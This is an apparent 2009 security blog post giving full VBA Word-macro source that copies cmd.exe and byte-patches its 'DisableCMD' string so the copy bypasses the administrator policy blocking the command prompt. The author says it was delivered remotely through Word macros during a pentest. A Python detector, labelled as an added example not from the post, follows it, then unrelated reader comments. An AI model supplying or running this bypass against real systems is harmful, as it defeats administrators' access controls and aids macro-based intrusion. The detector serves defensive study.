Tuesday, September 01, 2009

DisableCMD - History Repeating

Before I start: this is nothing new! It has actually been known for many years (e.g. http://blog.didierstevens.com/2007/11/28/quickpost-disableamd-disableregistryfools/)

During a pentest I needed to patch cmd.exe to ignore the DisableCMD policy setting. Nothing new, nothing special, but I needed to do it remotely and I had to use VBA/Word macros. Long story short, I decided to release the code, because it is nothing special and the technique is well known.

Here is a short video about it:

VBA Macro to remove DisableCMD CMD.EXE restriction from Max Moser on Vimeo.

Short video showing my VBA byte patcher, written to overcome the DisableCMD policy setting. Sorry, but I at least expected a fail-safe behavior.

I am not any good at coding VBA, but it might save someone some time. I will add an example.doc on remote-exploit.org as well.

Sub patchcmd()
    Dim Sourcefile As String, Destfile As String, Windir As String, Tempdir As String
    Dim F1 As Integer, F2 As Integer
    Dim bytepattern(19) As Byte
    Dim WshShell As Object

    Set WshShell = CreateObject("WScript.Shell")
    Windir = WshShell.ExpandEnvironmentStrings("%WinDir%")
    Tempdir = WshShell.ExpandEnvironmentStrings("%temp%")

    ' "DisableCMD" as it is stored in cmd.exe: UTF-16LE, so every
    ' character is followed by a 0x00 byte
    bytepattern(0) = &H44 'D
    bytepattern(1) = &H0
    bytepattern(2) = &H69 'i
    bytepattern(3) = &H0
    bytepattern(4) = &H73 's
    bytepattern(5) = &H0
    bytepattern(6) = &H61 'a
    bytepattern(7) = &H0
    bytepattern(8) = &H62 'b
    bytepattern(9) = &H0
    bytepattern(10) = &H6C 'l
    bytepattern(11) = &H0
    bytepattern(12) = &H65 'e
    bytepattern(13) = &H0
    bytepattern(14) = &H43 'C
    bytepattern(15) = &H0
    bytepattern(16) = &H4D 'M
    bytepattern(17) = &H0
    bytepattern(18) = &H44 'D

    Dim fileoffset As Long
    fileoffset = 0
    Dim patternoffset As Long
    patternoffset = 0
    Dim gotbad As Boolean
    gotbad = False

    Dim tmpbyte As Byte
    Dim patchbyte As Byte
    ' "4" replaces the "a", so the string no longer matches the policy value name.
    ' A Byte variable is used so that Put writes exactly one byte
    ' (a bare &H34 literal is an Integer and would write two).
    patchbyte = &H34

    Sourcefile = Windir & "\system32\cmd.exe"
    Destfile = Tempdir & "\dmc.exe"

    If Dir(Sourcefile) = "" Then Exit Sub
    FileCopy Sourcefile, Destfile
    F1 = FreeFile
    Open Sourcefile For Binary As F1

    F2 = FreeFile
    Open Destfile For Binary As F2

    While Not EOF(F1)
        gotbad = False

        Get #F1, , tmpbyte
        If tmpbyte = bytepattern(patternoffset) Then
            fileoffset = (Seek(F1) - 1) ' 1-based position of the byte just read

            While (gotbad = False)
                Get #F1, , tmpbyte
                patternoffset = patternoffset + 1
                If tmpbyte = bytepattern(patternoffset) Then
                    If patternoffset > 18 Then
                        'Debug.Print "Found DisableCMD at position: " & fileoffset & ", patching it now"
                        ' fileoffset + 6 is the "a" of "DisableCMD"
                        Put #F2, fileoffset + 6, patchbyte
                        Close F1
                        Close F2
                        MsgBox "Yeah, run it from: " & Destfile, vbOKOnly, "CMD.EXE patched"
                        End
                    End If
                Else
                    patternoffset = 0
                    gotbad = True
                End If
            Wend
        End If
    Wend
    Close F1
    Close F2
End Sub
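The flip side of the macro above, as an added defender-side example (my code, not the post's or the author's): a check that tells whether a cmd.exe copy still carries the UTF-16LE string "DisableCMD" intact, whether one code unit of it has been altered (the single-byte edit the macro makes), and at which byte offsets a suspect copy differs from the original. The file paths on the command line are assumptions; without arguments it runs on a constructed sample.

```python
import sys
from pathlib import Path

POLICY_NAME = "DisableCMD"
PATTERN = POLICY_NAME.encode("utf-16-le")   # b'D\x00i\x00s\x00a\x00b\x00...'


def classify_policy_string(data: bytes) -> dict:
    """Classify the policy-name string embedded in an image.

    Returns {'status': 'intact' | 'patched' | 'absent', 'offset', 'found'}.
    'patched' means exactly one ASCII code unit of the UTF-16LE name was
    changed, so a lookup of the policy value by that name would miss while
    the rest of the string still stands out. Only the first hit is reported."""
    off = data.find(PATTERN)
    if off != -1:
        return {"status": "intact", "offset": off, "found": POLICY_NAME}
    n = len(PATTERN)
    for i in range(len(data) - n + 1):
        window = data[i:i + n]
        if window[1::2] != b"\x00" * (n // 2):   # high bytes must all be zero
            continue
        bad = [k for k in range(0, n, 2) if window[k] != PATTERN[k]]
        if len(bad) == 1:
            return {"status": "patched", "offset": i,
                    "found": window.decode("utf-16-le", errors="replace")}
    return {"status": "absent", "offset": None, "found": None}


def differing_offsets(original: bytes, suspect: bytes, limit: int = 16) -> list:
    """Byte offsets where a suspect copy differs from the original.
    Copies of the same binary must have the same size; a size mismatch
    is reported as the single offset -1."""
    if len(original) != len(suspect):
        return [-1]
    return [i for i, (a, b) in enumerate(zip(original, suspect)) if a != b][:limit]


if __name__ == "__main__":
    if len(sys.argv) == 3:   # usage: check_cmd.py <original cmd.exe> <suspect copy>
        orig = Path(sys.argv[1]).read_bytes()
        susp = Path(sys.argv[2]).read_bytes()
    else:   # constructed sample: the string padded with zeros, then 'a' -> '4'
        orig = b"\x00" * 8 + PATTERN + b"\x00" * 8
        tmp = bytearray(orig)
        tmp[8 + 6] = 0x34
        susp = bytes(tmp)
    print("policy string in suspect:", classify_policy_string(susp))
    print("offsets differing from original:", differing_offsets(orig, susp))
```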

5 Comments:

Blogger Mehdi said...

You are a pro in security, MAX!

2:37 PM  
Blogger charLie.. said...

HELLO, CAN YOU HELP ME WITH BACK TRACK 4?? I CAN'T... JUST THAT I CAN'T FIND SUPPORT, I JUST CAN'T CONNECT TO THE INTERNET IN WIRED MODE, AND MY CONNECTION IS GOOD, BECAUSE I HAVE WINDOWS TOO, AND IN IT IT WORKS FINE.. CAN YOU HELP ME PLEASE :D! charlystaff@hotmail.com

3:46 AM  
Blogger jhon said...

It's so highly informative, the things that are posted in your blog. I was seeking this type of blog only, and also you have fresh and interesting content.
Web Conferencing

9:03 AM  
Blogger saeed_mehraban said...

I know it's irrelevant, but I started using wyd 0.2 and I see this error:
Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at Desktop/wyd-0.2/wyd.pl line 284.
I couldn't find anything about it on the net.
I thought maybe you can help me.

9:20 AM  
Blogger LinoCapella said...

Did you solve your problem, Saeed_Mehraban? I am having the same trouble as you did.

Can't locate object method "init" via package "wlgmod::doc" (perhaps you forgot to load "wlgmod::doc"?) at ./wyd-0.2/wyd.pl line 284.

Can someone help or explain what is going wrong?

Thanks

9:35 PM  
